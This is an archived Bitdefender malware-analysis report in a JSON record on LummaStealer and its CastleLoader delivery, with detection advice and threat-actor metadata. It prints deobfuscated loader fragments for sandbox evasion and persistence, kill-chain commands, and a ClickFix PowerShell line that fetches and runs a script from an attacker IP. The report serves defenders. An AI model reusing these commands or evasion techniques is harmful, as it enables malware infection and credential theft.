{
	"id": "df469e52-ccf3-4ba9-9ed4-393e3688e0f5",
	"created_at": "2026-04-06T01:30:16.218267Z",
	"updated_at": "2026-04-10T03:37:08.997924Z",
	"deleted_at": null,
	"sha1_hash": "48cf1e3184bbb2af724a60fabfd0a6f2a6cb75c5",
	"title": "LummaStealer Is Getting a Second Life Alongside CastleLoader",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 373943,
	"plain_text": "LummaStealer Is Getting a Second Life Alongside CastleLoader\r\nBy Bogdan Ionut Lazar\r\nArchived: 2026-04-06 01:16:16 UTC\r\nBitdefender researchers have discovered a surge in LummaStealer activity, showing how one of the world's most\r\nprolific information-stealing malware operations managed to survive despite being almost brought down by law\r\nenforcement less than a year ago.\r\nLummaStealer is a highly scalable information-stealing threat with a long history, having operated under a\r\nmalware-as-a-service model since it appeared on the scene in late 2022.\r\nThe threat quickly evolved into one of the most widely deployed infostealers worldwide, supported by a large\r\naffiliate ecosystem and a constantly adapting delivery infrastructure.\r\nDespite significant law-enforcement disruption efforts in 2025, LummaStealer operations continued,\r\ndemonstrating resilience by rapidly migrating to new hosting providers and adapting alternative loaders and\r\ndelivery techniques.\r\nOur analysis shows that LummaStealer infections are primarily driven by social engineering rather than by the\r\nexploitation of technical vulnerabilities.\r\nMalware campaigns consistently rely on users unwittingly running infected files, using simple lures such as fake\r\ncracked software, fake games or media downloads, and abuse of trusted platforms.\r\nRecent campaigns increasingly employ fake CAPTCHA (\"ClickFix\") techniques, converting normal users' web\r\ninteractions into direct command execution on victim systems.\r\nAt the core of many of these campaigns is CastleLoader, which plays a central role in helping LummaStealer\r\nspread through delivery chains. 
Its modular, in-memory execution model, extensive obfuscation, and flexible\r\ncommand-and-control communication make it well-suited to malware distribution of this scale.\r\nWe found some infrastructure overlap between CastleLoader and LummaStealer, which further suggests that both\r\ndeveloper teams are coordinating on it or at least share service providers.\r\nKey Findings\r\nLummaStealer is back at scale, despite a major 2025 law-enforcement takedown that disrupted thousands\r\nof its command-and-control domains. The operation has rapidly rebuilt its infrastructure and continues to\r\nspread worldwide.\r\nMost infections start with social engineering, not hacking. Victims are tricked into running the malware\r\nthemselves through fake cracked software, fake game or movie downloads, and deceptive \"human\r\nverification\" pages.\r\nhttps://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nPage 1 of 17\n\nFake CAPTCHA (\"ClickFix\") attacks are becoming a preferred entry point, turning routine web\r\ninteractions into manual command execution by the victim.\r\nCastleLoader has become a central delivery mechanism, using in-memory execution, heavy obfuscation,\r\nand flexible payload deployment to evade detection and distribute LummaStealer.\r\nA DNS artefact exposes CastleLoader activity. The loader deliberately triggers failed DNS lookups to\r\nnonexistent domains, creating a detectable pattern that can be used to identify related campaigns.\r\nInfrastructure overlap links CastleLoader and LummaStealer operations, suggesting shared services or\r\ncoordination within a broader malware-as-a-service ecosystem.\r\nThe privacy impact is severe and long-lasting. 
Stolen credentials, active sessions, personal documents and\r\ncryptocurrency data enable account takeovers, financial fraud, identity theft and extortion.\r\nIntroduction\r\nLummaStealer emerged on Russian-language forums in late 2022, and evolved into one of the most prolific\r\ninfostealers by the mid-2020s. It targets Windows systems and can harvest a wide range of sensitive data,\r\nincluding browser credentials, session cookies, cryptocurrency wallets and even two-factor authentication (2FA)\r\ntokens.\r\nUnder its MaaS model, Lumma's developers lease the malware to an extensive network of cybercriminal affiliates\r\nacross the world. This has resulted in hundreds of thousands of infections across multiple industries, positioning\r\nLumma as a significant enabler of secondary crimes such as account takeovers and fraudulent financial activity.\r\nIn May 2025, Lumma's infrastructure was disrupted during a law-enforcement takedown that neutralized more\r\nthan 2,300 command-and-control domains. However, the operation wasn't fully dismantled. Instead, the threat\r\nactors behind Lumma migrated to bulletproof hosting providers that are less cooperative with law enforcement.\r\nRecently, we have observed a considerable increase in LummaStealer activity in our insights. Loaders are\r\ntypically delivered through evolving social-engineering lures, ranging from fake CAPTCHA challenges to bogus\r\nupdate notifications on Steam pages and game development websites. The loaders themselves change frequently;\r\nwe've seen LummaStealer using Rugmi, DonutLoader, and, more recently, CastleLoader for initial execution.\r\nBy itself, CastleLoader is a sophisticated loader that executes in stages, entirely in memory, obfuscates its code,\r\ndynamically resolves APIs, and communicates with a large C2 infrastructure using stealth techniques. 
Its flexible,\r\nmodular design allows threat actors to plug in various payloads while remaining relatively hidden in victim\r\nsystems.\r\nPrevious research has identified an overlap between the infrastructure used in Lumma Stealer and CastleLoader\r\ncampaigns. Recorded Future's Insikt Group, which monitors the threat actor known as GrayBravo, the developer\r\nbehind CastleLoader, observed that multiple domains within the CastleLoader ecosystem were also linked to\r\nLumma operations.\r\nThis shared infrastructure suggests that the same threat actors and service providers may be supporting both\r\nCastleLoader and Lumma Stealer. This overlap is consistent with the reuse of domain registrations or hosting\r\nresources across multiple malware families, further highlighting the close operational relationship between\r\nCastleLoader and LummaStealer delivery activity.\r\nIn this research, we examine how LummaStealer is delivered via CastleLoader, outline the most common\r\ndistribution methods, and highlight indicators of compromise (IoCs) and behavioral patterns to identify\r\nCastleLoader and LummaStealer activity. We also present a method for identifying recent CastleLoader scripts\r\nusing failed DNS requests.\r\nTechnical analysis - CastleLoader\r\nCastleLoader is a script-based loader that aims to decrypt and load a payload into memory. Variants are\r\nimplemented in Python, but we discovered one implemented in AutoIt in this campaign.\r\nChoosing script interpreters to implement the loader can bypass dynamic detection during runtime, as script\r\ninterpreter processes can, by design, perform various actions depending on the script they run. 
In this case,\r\nantimalware solutions might be more permissive towards them.\r\nAnother reason is that it is very easy to apply obfuscation schemes to script files (changing function and variable\r\nnames with words from a dictionary, control-flow obfuscation, etc.).\r\nThe main CastleLoader executables we analysed are delivered as compiled AutoIt files. These files bundle an\r\nAutoIt script and the AutoIt interpreter into a single executable for convenience.\r\nAfter extracting the embedded AutoIt script, we are faced with a heavily obfuscated script, where most of the code\r\nleads to dead ends or to instructions that don't do anything on the system. Deobfuscating the script reveals its true\r\nintent.\r\nAs a first pattern, we can see that variables are renamed using words or word combinations from a dictionary.\r\nAnother common occurrence is a function that decodes strings in the file by taking the hex values in the buffer and\r\nsubtracting the key from them.\r\nFunc COMMONLYOMAN ( $REMEMBER , $ANGER )\r\n$CEMENT = \"\"\r\n $CONFIGURATIONAIRPORT = Call ( StringReverse ( \"tilpSgnirtS\" ) , $REMEMBER , \"%\" , 2 )\r\nFor $AMEND = 269 + 4294967027 To Call ( \"UBound\" , $CONFIGURATIONAIRPORT ) + 4294967295\r\n $CEMENT \u0026= ChrW ( $CONFIGURATIONAIRPORT [ $AMEND ] - $ANGER )\r\nNext\r\nReturn $CEMENT\r\nEndFunc\r\nEven after deobfuscation, we are still left with many junk instructions (e.g., arithmetic operations that yield trivial\r\nresults, conditions that always resolve to one branch, etc.). However, we can start to make sense of the script now.\r\nFirst, we see a section where some sandbox/environment detection happens. 
If specific computer names or\r\nusernames are found, the process window is closed, effectively terminating execution.\r\n( Call ( \"EnvGet\" , \"COMPUTERNAME\" ) = \"tz\" ) ? ( Call ( \"WinClose\" , Call ( \"AutoItWinGetTitle\" ) ) ) : ( Opt (\r\n( Call ( \"EnvGet\" , \"COMPUTERNAME\" ) = \"NfZtFbPfH\" ) ? ( Call ( \"WinClose\" , Call ( \"AutoItWinGetTitle\" ) ) ) :\r\n( Call ( \"EnvGet\" , \"COMPUTERNAME\" ) = \"ELICZ\" ) ? ( Call ( \"WinClose\" , Call ( \"AutoItWinGetTitle\" ) ) ) : ( Op\r\n( Call ( \"EnvGet\" , \"USERNAME\" ) = \"test22\" ) ? ( Call ( \"WinClose\" , Call ( \"AutoItWinGetTitle\" ) ) ) : ( Opt (\r\nUnintended CastleLoader characteristic - 
anomalous DNS requests\r\nAfter sandbox detection, we noticed a Ping operation that fails with a nonexistent domain, as the failure branch\r\ncontains code to hide the window of the executing AutoIt process.\r\nHowever, this leaves an interesting artifact that makes the loader identifiable. The ping function tries to resolve the\r\ndomain generated as a random string repeated twice, joined by a dot, i.e., \u003cstring\u003e.\u003cstring\u003e.\r\nThis behavior triggers a DNS lookup for a nonexistent domain. The resulting anomalous request is easy to identify\r\nusing this pattern, which allowed us to uncover hundreds of samples linked to the current campaign.\r\n( Ping ( \"sfcphDaHojOHzEbBXPMIuBTaOH.sfcphDaHojOHzEbBXPMIuBTaOH\" , 1000 ) \u003c\u003e 0 ) ? ( Call ( \"WinClose\" , Call (\r\nSandbox detection and payload decoding\r\nIt then checks whether the script is running in a sandbox. If processes specific to virtualization software are\r\nrunning on the system, the loader terminates its execution.\r\nIf ProcessExists ( \"vmtoolsd.exe\" ) = True Or ProcessExists ( \"VboxTray.exe\" ) = True Or ProcessExists ( \"Sandb\r\n( Call ( \"ProcessExists\" , \"avastui.exe\" ) ) ? CustomSleep ( 10000 ) : ( Opt ( \"TrayIconHide\" , 29683490 / 29683\r\nThe following lines contain adjustments to persistence paths based on specific antimalware solutions installed on\r\nthe system. 
This is probably the result of testing with said antimalware vendor and detection evasion that worked\r\nat the time of development.\r\n$persistence_drop_path_2 = @LocalAppDataDir \u0026 \"\\CraftStitch Studios Inc\\V\"\r\nIf ProcessExists ( \"AvastUI.exe\" ) Or ProcessExists ( \"AVGUI.exe\" ) Or ProcessExists ( \"SophosHealth.exe\" ) Then\r\n$persistence_drop_path_2 = @LocalAppDataDir \u0026 \"\\CraftStitch Studios Inc\\V.a3x\"\r\nIf Not FileExists ( $persistence_drop_path_2 ) Then\r\nFileCopy ( @ScriptFullPath , $persistence_drop_path_2 , 9 )\r\nEndIf\r\n$persistence_drop_path = @LocalAppDataDir \u0026 \"\\CraftStitch Studios Inc\\StitchCraftX.bat\"\r\nIf ProcessExists ( \"AvastUI.exe\" ) Or ProcessExists ( \"AVGUI.exe\" ) Or ProcessExists ( \"bdagent.exe\" ) Or Proces\r\n$persistence_drop_path = @LocalAppDataDir \u0026 \"\\CraftStitch Studios Inc\\AutoIt3.exe\"\r\nIf Not FileExists ( $persistence_drop_path ) And $persistence_drop_path \u003c\u003e @AutoItExe Then\r\n$drop_exe_file = FileOpen ( $persistence_drop_path , 10 )\r\nFileWrite ( $drop_exe_file , FileRead ( FileOpen ( @AutoItExe , 16 ) ) )\r\nFileClose ( $drop_exe_file )\r\nEndIf\r\n$persistence_drop_path_3 = @LocalAppDataDir \u0026 \"\\CraftStitch Studios Inc\\StitchCraftX.lnk\"\r\nIf Not FileExists ( $persistence_drop_path_3 ) Then\r\nFileCreateShortcut ( $persistence_drop_path , $persistence_drop_path_3 , @LocalAppDataDir \u0026 \"\\CraftStit\r\nEndIf\r\nIf ProcessExists ( \"avp.exe\" ) Or ProcessExists ( \"bdagent.exe\" ) Then\r\n$internet_shortcut_file = FileOpen ( @StartupDir \u0026 \"\\StitchCraftX.url\" , 34 )\r\nFileWrite ( $internet_shortcut_file , \"[InternetShortcut]\" \u0026 @CRLF \u0026 \"URL=\" \u0026 ChrW ( 34 ) \u0026 $persistenc\r\nFileClose ( $internet_shortcut_file )\r\nElse\r\n$BULLLEGITIMATELONGITUDEWOODS = DllCall ( \"kernel32.dll\" , \"bool\" , \"CreateProcessW\" , \"wstr\" , Null 
,\r\nEndIf\r\nPersistence is done in 3 steps:\r\n1.      Copies the currently executing script (embedded in the initial executable) to the variable constructed in\r\n$persistence_drop_path_2 (note: variable was renamed during analysis)\r\n2.      Copies the AutoIt interpreter to $persistence_drop_path\r\n3.      Creates an Internet shortcut file in the current user's Startup directory that launches the AutoIt interpreter\r\nwith the script as a command-line argument\r\nFinally, it uses two hardcoded shellcodes to decrypt and load the intended payload, which can be either the\r\nLumma stealer executable or a further stage in the execution chain (e.g. a downloader that fetches the stealer from\r\na C2 server).\r\nThe first shellcode decrypts the payload with a given XOR key, while the second one uses a different XOR key to\r\ndecrypt the second layer. This results in an LZNT1-compressed buffer, which is decompressed using\r\nRtlDecompressFragment to obtain a valid MZPE stream.\r\nThis payload is then loaded into the current process's address space and executed.\r\nLummaStealer analysis\r\nLummaStealer is offered as MaaS, with clients able to purchase a subscription tier to access some of the malware's\r\nfeatures and capabilities.\r\nThis ranges from various infection vectors and loaders to a complete C2 infrastructure for the operations of the\r\nstealer. 
The pricing in 2023 ranged from $250 to $20,000 for the full premium package.\r\nThe malware itself, once delivered and launched, is a straightforward stealer, meaning that it collects files\r\ncontaining sensitive data and uploads them to the C2 server specified in its config file.\r\nStealing capabilities of the payload:\r\nCredentials saved in web browsers\r\nCookies\r\nPersonal documents (.docx, .pdf, etc.)\r\nSensitive files containing financial information, secret keys (including cloud keys), 2FA backup codes, and\r\nserver passwords as well as cryptocurrency private keys and wallet data\r\nPersonal data such as ID numbers, addresses, medical records, credit card numbers, and dates of birth\r\nCryptocurrency wallets and browser extensions associated with popular services like MetaMask, Binance,\r\nElectrum, Ethereum, Exodus, Coinomi, Bitcoin Core, JAXX, and Steem Keychain.\r\nData from remote access tools and password managers, specifically AnyDesk and KeePass.\r\nTwo-factor authentication (2FA) tokens and extensions such as Authenticator, Authy, EOS Authenticator,\r\nGAuth Authenticator, and Trezor Password Manager.\r\nInformation from VPNs (.ovpn files), various email clients (Gmail, Outlook, Yahoo), and FTP clients.\r\nSystem metadata, including CPU information, operating system version (Windows 7 to Windows 11),\r\nsystem locale, installed applications, username, hardware ID, and screen resolution, is useful for profiling\r\nvictims or tailoring future exploits.\r\nIn the sample we analyzed from the CastleLoader delivery, we have also seen the following capabilities:\r\ntheft of Discord and Steam data\r\nscreenshot capture\r\nclipboard data\r\nCampaign distribution and user lures\r\nThe campaigns we observed primarily rely on social engineering rather than 
on exploiting software\r\nvulnerabilities. Across all analyzed killchains, the initial compromise takes place only after the user actually runs\r\nthe malware. The attacker's success depends on persuading the victim to run malicious content.\r\nThis approach is particularly effective in the Lumma ecosystem because loaders such as CastleLoader are\r\nlightweight, flexible, and designed to blend into common content that people might find online.\r\nIn the following, we dissect some of the most prevalent delivery methods.\r\nCastleLoader delivery flavours\r\nThe CastleLoader chains we analyzed usually start with bait downloads. This seems to be the most prevalent tactic\r\nof the Lumma ecosystem.\r\nThese baits range from creating fake websites that promise cracked software installers, nonexistent game installers\r\non itch[.]io, torrents promising newly released movies or, very often, adult movies.\r\nThe files delivered this way are usually self-extracting archives or NSIS installers. The files contain CastleLoader\r\neither as an embedded script in the executable or a separate AutoIt interpreter and a script file, both written to the\r\nsame folder on the disk.\r\nFree and pirated software\r\nOne of the most common lure categories observed in these campaigns involves fake installers for cracked or\r\npremium software. Victims are redirected to websites advertising free access to commercial tools, game cracks, or\r\nother software. These downloads are usually packaged as self-extracting archives or NSIS installers, formats that\r\nclosely resemble legitimate software distribution.\r\nCastleLoader-based chains frequently begin with such bait downloads. 
The user executes what appears to be a\r\nstandard installer, which in reality contains the initial loader stage.\r\nBecause cracked software is expected to trigger warnings, require elevated privileges, or behave inconsistently,\r\nsecurity prompts generated by the operating system or endpoint protection solutions are often dismissed as typical\r\nside effects rather than indicators of malicious activity.\r\nA typical killchain in this scenario would look something like:\r\n1. Initial Access: The user downloads the lure \"game installer\" archive and either double-clicks the setup.exe\r\ninside or extracts the files in the intended location and then runs the setup.\r\n2. Execution: setup.exe is the entry point of the malware, and it is willingly launched by the user\r\nexplorer.exe → \\Device\\HarddiskVolumeX\\NFS\\Need for Speed Hot Pursuit\\Setup.exe\r\n3. Installation: The fake installer writes the embedded components to the filesystem: Sessions.vstm (a .bat file)\r\nand Point.vstm (a cabinet (.cab) archive file with CastleLoader inside)\r\n4. The fake installer launches the command-line utility to execute the batch script\r\ncmd.exe /c cmd \u003c Sessions.vstm\r\n5. The batch script does some initial environment checking to adjust file names if some antimalware components\r\nare found.\r\ntasklist | findstr \"SophosHealth nsWscSvc ekrn bdservicehost AvastUI AVGUI \u0026 if not errorlevel 1 Set WZiGzYQA\r\n6. The batch script runs extrac32, present on the system, to extract the .cab file in the current directory\r\nextrac32 /Y Point.vstm *.*\r\n7. Finally, the batch script launches the renamed AutoIt interpreter (Rope.pif) with the CastleLoader script as a\r\nparameter (b). 
This will achieve the objective of the malware, to execute LummaStealer on the victim system.\r\nRope.pif b\r\nAnother recurring lure consists of nonexistent game installers or archives advertising newly released movies, often\r\ndistributed through torrent platforms or file-sharing websites.\r\nAdult-themed content is also frequently used to attract victims and reduce scrutiny. These files are also often\r\npackaged as self-extracting archives or NSIS installers. They contain relatively small CastleLoader resources and\r\na large chunk of random data, which increases the overall file size.\r\nThis technique further legitimizes the file for the user, as a movie should be larger than 600-700 MB.\r\nFile and folder naming conventions, archive structures, and embedded executables are crafted to appear consistent\r\nwith real game or media downloads. Users anticipate extraction steps and launcher executables, making it less\r\nsuspicious when malware is executed from temporary directories or newly created folders.\r\nMultiple clusters in our telemetry reflect this pattern, with execution originating from WinRAR extraction paths or\r\nuser download directories before transitioning into CastleLoader-driven execution chains.\r\n1. Initial Access: The user downloads a torrent that promises a newly released movie in an archive. The user\r\nopens the archive and double-clicks the \"movie\" file.\r\nexplorer.exe -\u003e Command: \"C:\\Program Files\\WinRAR\\WinRAR.exe\" \"D:\\TORRENT\\Mission Impossible. Final Reckoning.\r\n2. Execution: The \"movie\" file is a Windows executable and it has a double extension .mp4.exe. Instead of\r\nplaying a movie it will run on the system. 
Double-clicking it from an archive will extract it in the current user's\r\n%TEMP% folder and execute it from there.\r\nProcess: \\Device\\HarddiskVolumeX\\Users\\anonymized_user\\AppData\\Local\\Temp\\Rar$EXa14612.44616\\Mission Impossible\r\n3. Installation: The executable is an installer and it writes the resources to the filesystem under a random name\r\n(e.g. Pros)\r\n4. Launches the command-line utility to rename Pros to Pros.cmd, allowing direct execution by the cmd.exe\r\nprocess\r\nCommand: \"C:\\Windows\\System32\\cmd.exe\" /c copy Pros Pros.cmd \u0026 Pros.cmd\r\n5. The .cmd script performs an environment check, searching for antimalware components. It uses utilities already\r\npresent on the system\r\ntasklist | findstr /I \"opssvc wrsa\"\r\ntasklist | findstr \"AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth\r\n6. Creates a new directory in the %TEMP% folder where it was launched from with the command\r\ncmd /c md 187743\r\n7. Extracts the .cab file with the extrac32 tool\r\nCommand: extrac32 /Y /E Luggage\r\n8. Copies all extracted components into the newly created directory, concatenating the individual parts of the files\r\n(static detection evasion) into a single executable and a single script.\r\nCommand: cmd /c copy /b 187743\\AutoIt3.exe + Jeff + Medicine + Controller + Marketplace + Vienna + Ebooks + P\r\n9. 
Finally, it launches the CastleLoader script with the newly written AutoIt interpreter:\r\nCommand: AutoIt3.exe V.a3x\r\nExamples of games and software lures\r\nmad max.exe\r\n{autocad 2008 keygen only xforce rar}.exe - software pirating lure\r\nMicrosoft dynamics rms product key work.exe\r\nTradingView Installer Setup 2.11.7073.exe - financial software\r\nDark_souls_prepare_to_die_edition_[full][español][mega].exe - cracked game\r\nsim aquarium 3 crack 4.exe - cracked game\r\nKɱŠpico.rar - similar to KMS pico, Windows activation\r\nMovavi Video Editor 15.4.1 Crack With Registration Key Free Download 2020 - cracked software\r\nFix Low FPS Speed Up Your Processor Optimize CPU for Gaming Performance - RiPEX.tmp -\r\nperformance optimizer lure\r\nExamples of movies and tv shows lures\r\nThe Pendragon Cycle Rise of the Merlin S01E03 1080p WEB-DL NewComers.exe\r\nA Knight of the Seven Kingdoms S01E03 720p HMAX WEB-DL DDP5 1 H 264-NTb.exe\r\npredator badlands 2025.1080p.web.h264-slot.exe\r\nshelter (2026) [1080p] [webrip] [5.1].exe\r\navatar fire and ash (2025) [1080p] [webrip] [5.1].exe\r\nAbuse of legitimate platforms and content delivery networks\r\nLumma loaders were distributed across multiple campaigns via legitimate platforms and content delivery\r\nnetworks, including game-related websites, messaging platforms, and file-sharing services.\r\nWhile the underlying infrastructure is not malicious, it lends credibility to the payload and lowers the perceived\r\nrisk for the user.\r\nThe most significant CDNs observed are:\r\nSteam workshop\r\nDiscord shared files\r\nClickFix delivery\r\nClickFix remains an important and highly effective infection vector in LummaStealer campaigns. 
Unlike\r\ntraditional malware delivery methods, ClickFix does not rely solely on file downloads.\r\nInstead, it abuses fake CAPTCHA or verification pages that instruct users to perform a series of manual actions to\r\n\"prove\" they are human.\r\nTypically, victims are instructed to press Win + R, paste the contents of the clipboard, and press Enter. The\r\nmalicious website has already placed a PowerShell one-liner on the clipboard, which, when executed, retrieves\r\nand runs the next-stage loader directly from the attacker's infrastructure.\r\nIn several cases, this stage subsequently deployed CastleLoader, which then fetched and executed LummaStealer.\r\nExample command line:\r\ncmd.exe /c start /min powershell [Text.Encoding]::UTF8.GetString((('262867616c2077672a29202d7573656220687474703\r\nThe encoded text translates to an Invoke-WebRequest command whose results are piped to an Invoke-Expression\r\ncommand, effectively executing the script hosted on the server.\r\n\u0026(gal wg*) -useb hxxp://45[.]221[.]64[.]224/12.d|iex\r\nThe effectiveness of ClickFix lies in its abuse of procedural trust rather than technical vulnerabilities. The\r\ninstructions resemble troubleshooting steps or verification workarounds that users may have encountered\r\npreviously.\r\nAs a result, victims often fail to recognize that they are manually executing arbitrary code on their own system.\r\nDelivery with obfuscated VBA\r\nIn some campaigns, we saw an extra layer of a loader that runs obfuscated VBA scripts before running the AutoIt\r\nscript that loads LummaStealer. Persistence is achieved through scheduled tasks, and the VBA loader runs the\r\nschtasks command to enable periodic execution.\r\nThe killchain looks very similar to the ones presented before.\r\n1. 
The user is lured to run the first executable that extracts a VBA script to a path that resembles legitimate\r\nsoftware.\r\n2. Then, the installer executes wscript.exe with the script file\r\n\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\anonymized_user\\AppData\\Local\\SyncSmartHomeX Elite Technologies Co\\\r\n3. The script ensures persistence with a scheduled task that runs every minute\r\ncmd /c schtasks.exe /create /tn \"Once\" /tr \"wscript //B 'C:\\Users\\anonymized_user\\AppData\\Local\\SyncSmartHomeX\r\n4. The script is responsible for executing the renamed AutoIt interpreter with the script passed as a command-line\r\nargument\r\n\"C:\\Users\\anonymized_user\\AppData\\Local\\SyncSmartHomeX Elite Technologies Co\\SmartHomeSyncX.pif\" \"C:\\Users\\NIU\r\nGeographical distribution\r\nLumma stealer is still prevalent globally, with active infections observed mostly in India but also in the US and\r\nEurope. The investigation covered a period of one month, between December 12 and January 12.\r\nIt's worth noting that, since Lumma operates as a malware-as-a-service, the distribution shown below is just a\r\nsnapshot. When the threat actors who buy these services decide to target other regions, the distribution will shift\r\naccordingly.\r\nPrivacy impact\r\nOnce LummaStealer is successfully deployed, the impact on user privacy is severe. The malware is designed to\r\nharvest a broad range of sensitive information from infected systems, enabling both immediate exploitation and\r\nlong-term abuse.\r\nCompromised credentials and active sessions\r\nLummaStealer extracts stored credentials, authentication cookies, and active browser sessions from a wide range\r\nof applications. 
This enables attackers to bypass passwords entirely and access user accounts directly.\r\nEmail accounts are particularly valuable targets, as they allow attackers to reset credentials for other services and\r\nfacilitate large-scale account takeover scenarios.\r\nFinancial and cryptocurrency exposure\r\nInfected systems may expose cryptocurrency wallets, browser-stored payment information, and authenticated\r\nsessions for financial platforms. Even when direct wallet theft is not immediately observed, stolen credentials and\r\nsessions can be sold or reused for fraudulent transactions, subscription abuse, or monetization through\r\nunderground markets.\r\nPersonal documents and identity theft\r\nThe exfiltration of documents and images significantly increases the long-term impact of infection. Sensitive\r\npersonal files such as identification documents, contracts, invoices, or private correspondence may be harvested\r\nand used for identity theft, fraud, or highly targeted social engineering.\r\nBlackmail and coercion risks\r\nIn campaigns leveraging adult-themed or sensitive lures, attackers may attempt extortion by threatening to\r\ndisclose browsing habits, private documents, or alleged surveillance data. Even when such claims are exaggerated,\r\nthe stolen information can be sufficient to pressure victims into compliance, amplifying the harm caused by the\r\ninfection.\r\nRecommended user and organizational mitigations\r\nBecause LummaStealer and its associated loaders rely heavily on user interaction, effective mitigation requires a\r\ncombination of user awareness, behavioral controls, and post-infection response.\r\nUsers should avoid downloading software, games, or media from untrusted or unofficial sources, particularly\r\nwhen content is advertised as cracked, free, or exclusive. 
Any website instructing users to manually execute\r\ncommands, especially PowerShell and command-line utilities, should be treated as malicious by default.\r\nIn the event of suspected infection, remediation must extend beyond malware removal. Users should immediately\r\nrotate passwords for all accounts accessible on the affected system, invalidate active sessions where possible, and\r\nprioritize credential changes for email, financial services, and work-related platforms. In many cases, a full\r\noperating system reinstallation is required to restore trust in the compromised device.\r\nOrganizations should invest in user education focused on social engineering techniques, monitor for anomalous\r\nauthentication behavior, and enforce multi-factor authentication to reduce the impact of credential theft. Detection\r\nstrategies should include behavioral indicators associated with loaders such as CastleLoader, including suspicious\r\nprocess chains, abuse of living-off-the-land binaries, and anomalous DNS activity.\r\nConclusions\r\nLummaStealer remains a significant and evolving threat due to its combination of effective social engineering,\r\nflexible loader infrastructure, and a well-established MaaS ecosystem.\r\nhttps://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nPage 16 of 17\n\nThe continued use of loaders such as CastleLoader, along with techniques like ClickFix, demonstrates a strategic\r\nshift toward delivery mechanisms that are difficult to disrupt through traditional technical defenses alone.\r\nEffective defense against LummaStealer requires more than signature-based detection or infrastructure takedowns.\r\nBecause the infection chain depends on user interaction, prevention must emphasize user awareness, behavioral\r\nmonitoring, and rapid response to credential compromise.\r\nEndpoint detection strategies should focus on identifying anomalous process chains, living-off-the-land binary\r\nabuse, and suspicious network 
behavior associated with loader activity.\r\nAs LummaStealer continues to adapt, defenders must assume that initial access will increasingly resemble\r\nlegitimate user behavior. Understanding the social engineering context, delivery ecosystem, and post-compromise\r\nimpact is therefore essential for detecting, mitigating, and ultimately reducing the effectiveness of LummaStealer\r\nand similar infostealer operations.\r\nYou can check out the complete list of IoCs on GitHub.\r\nSource: https://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nhttps://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nPage 17 of 17\n\n  https://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader    \n1. Initial Access: The user downloads a torrent that promises a newly released movie in an archive. The user\nopens the archive and double-clicks the \"movie\" file.   \nexplorer.exe -\u003e Command: \"C:\\Program Files\\WinRAR\\WinRAR.exe\"  \"D:\\TORRENT\\Mission Impossible. Final Reckoning.\n2. Execution: The \"movie\" file is a Windows executable and it has a double extension .mp4.exe. Instead of\nplaying a movie it will run on the system. Double-clicking it from an archive will extract it in the current user's\n%TEMP% folder and execute it from there.    \nProcess: \\Device\\HarddiskVolumeX\\Users\\anonymized_user\\AppData\\Local\\Temp\\Rar$EXa14612.44616\\Mission     Impossible\n3. Installation: The executable is an installer and it writes the resources to the filesytem under a random name\n(e.g. Pros)      \n   Page 11 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader"
	],
	"report_names": [
		"lummastealer-second-life-castleloader"
	],
	"threat_actors": [
		{
			"id": "8a13b9be-e36d-4d48-9d19-5c93a62f862f",
			"created_at": "2026-03-08T02:00:03.472285Z",
			"updated_at": "2026-04-10T02:00:03.982274Z",
			"deleted_at": null,
			"main_name": "GrayBravo",
			"aliases": [
				"TAG-150"
			],
			"source_name": "MISPGALAXY:GrayBravo",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
